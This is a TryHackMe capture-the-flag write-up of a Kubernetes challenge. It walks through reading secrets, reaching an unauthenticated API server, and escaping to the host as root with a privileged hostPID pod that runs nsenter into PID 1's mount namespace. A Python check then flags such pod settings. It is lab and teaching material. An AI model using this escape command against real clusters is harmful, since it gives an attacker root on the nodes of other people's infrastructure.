TryHackMe: kubernetes chall tdi 2020
Use the provided credentials to access the Kubernetes cluster and find the first flag somewhere inside.
alias k="KUBECONFIG=diana.kubeconfig kubectl --server https://10.10.110.14:6443 --insecure-skip-tls-verify"
k version
Client Version: version.Info{Major:"1", Minor:"20", GitVersion:"v1.20.5", GitCommit:"6b1d87acf3c8253c123756b9e61dac642678305f", GitTreeState:"clean", BuildDate:"2021-03-31T15:33:39Z", GoVersion:"go1.15.10", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"18", GitVersion:"v1.18.3", GitCommit:"2e7996e3e2712684bc73f0dec0200d64eec7fe40", GitTreeState:"clean", BuildDate:"2020-05-20T12:43:34Z", GoVersion:"go1.13.9", Compiler:"gc", Platform:"linux/amd64"}
k get secrets flag1 -o yaml
apiVersion: v1
data:
  flag: [REDACTED]
  message: [REDACTED]
Become cluster admin and find the second flag inside.
k run t00lbox --image tdi-ctf-toolbox:1.0.0 -it --rm bash --image-pull-policy=IfNotPresent
copy/paste to /tmp/poc.py
chmod +x /tmp/poc.py
/tmp/poc.py 203.0.113.1 &
check with nc 203.0.113.1 8080
get /
kubectl --server http://198.51.100.1:8080 get secrets -n kube-system flag2 -o yaml
apiVersion: v1
data:
  flag: [REDACTED]
  message: [REDACTED]
Get the bonus flag from kubernetes.
kubectl --server http://198.51.100.1:8080 get flag -A -o yaml
apiVersion: v1
items:
- apiVersion: dianainitiative.org/v1
  kind: Flag
  metadata:
    annotations:
      kubectl.kubernetes.io/last-applied-configuration: |
        {"apiVersion":"dianainitiative.org/v1","kind":"Flag","metadata":{"annotations":{},"name":"bonus-1","namespace":"kube-public"},"spec":{"flag":"TDI{exploring_the_kubernets}"}}
    creationTimestamp: "2022-08-16T03:51:50Z"
    generation: 1
    managedFields:
    - apiVersion: dianainitiative.org/v1
      fieldsType: FieldsV1
      fieldsV1:
        f:metadata:
          f:annotations:
            .: {}
            f:kubectl.kubernetes.io/last-applied-configuration: {}
        f:spec:
          .: {}
          f:flag: {}
      manager: kubectl
      operation: Update
      time: "2022-08-16T03:51:50Z"
    name: bonus-1
    namespace: kube-public
    resourceVersion: "29338"
    selfLink: /apis/dianainitiative.org/v1/namespaces/kube-public/flags/bonus-1
    uid: 9e9cdeef-8dd5-45f6-a441-3d4eebbf24c5
  spec:
    flag: [REDACTED]
Escape to root on the host and find the third flag.
https://securekubernetes.com/scenario_2_attack/
kubectl --server http://198.51.100.1:8080 run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
root@r00t:~# cat /root/flag3.txt
[REDACTED]
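The pod above reaches the node's root filesystem because it combines hostPID with a privileged container, which lets nsenter join PID 1's mount namespace. As an added example (not part of the original writeup or the room), this Python check flags those settings in a pod spec, the kind of rule an admission policy would enforce; it also covers hostNetwork, hostIPC and hostPath volumes, which goes beyond what this pod uses. The function and sample names are assumptions.

```python
import json

# Pod-level fields that share a host namespace with the pod.
HOST_NAMESPACE_FIELDS = ("hostPID", "hostNetwork", "hostIPC")
CONTAINER_LISTS = ("containers", "initContainers", "ephemeralContainers")

# Constructed sample: the pod spec passed via --overrides in the step above.
ESCAPE_OVERRIDES = json.loads("""
{"spec": {"hostPID": true, "containers": [{"name": "1", "image": "alpine",
  "command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "/bin/bash"],
  "stdin": true, "tty": true, "imagePullPolicy": "IfNotPresent",
  "securityContext": {"privileged": true}}]}}
""")

# Constructed sample: an ordinary pod that should produce no findings.
BENIGN_POD = {"spec": {"containers": [{"name": "web", "image": "nginx",
    "securityContext": {"allowPrivilegeEscalation": False}}]}}


def audit_pod(pod):
    """Return findings for pod settings that expose the node to the pod."""
    spec = pod.get("spec") or {}
    findings = []
    for field in HOST_NAMESPACE_FIELDS:
        if spec.get(field) is True:
            findings.append(f"spec.{field}=true")
    for volume in spec.get("volumes") or []:
        if "hostPath" in volume:
            path = (volume["hostPath"] or {}).get("path")
            findings.append(f"volume {volume.get('name')!r} mounts hostPath {path!r}")
    for kind in CONTAINER_LISTS:
        for container in spec.get(kind) or []:
            ctx = container.get("securityContext") or {}
            if ctx.get("privileged") is True:
                findings.append(f"{kind}[{container.get('name')!r}] privileged=true")
    return findings


if __name__ == "__main__":
    for label, pod in (("escape pod", ESCAPE_OVERRIDES), ("benign pod", BENIGN_POD)):
        result = audit_pod(pod)
        print(label, "->", "REJECT: " + "; ".join(result) if result else "ALLOW")
```

Run the same function over the output of a pod listing in JSON form to audit workloads that are already scheduled.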
Find the bonus flag on the host.
root@r00t:~# history
echo "[REDACTED]"
Done
It was an interesting room. I had not used Kubernetes before, so I learnt something new.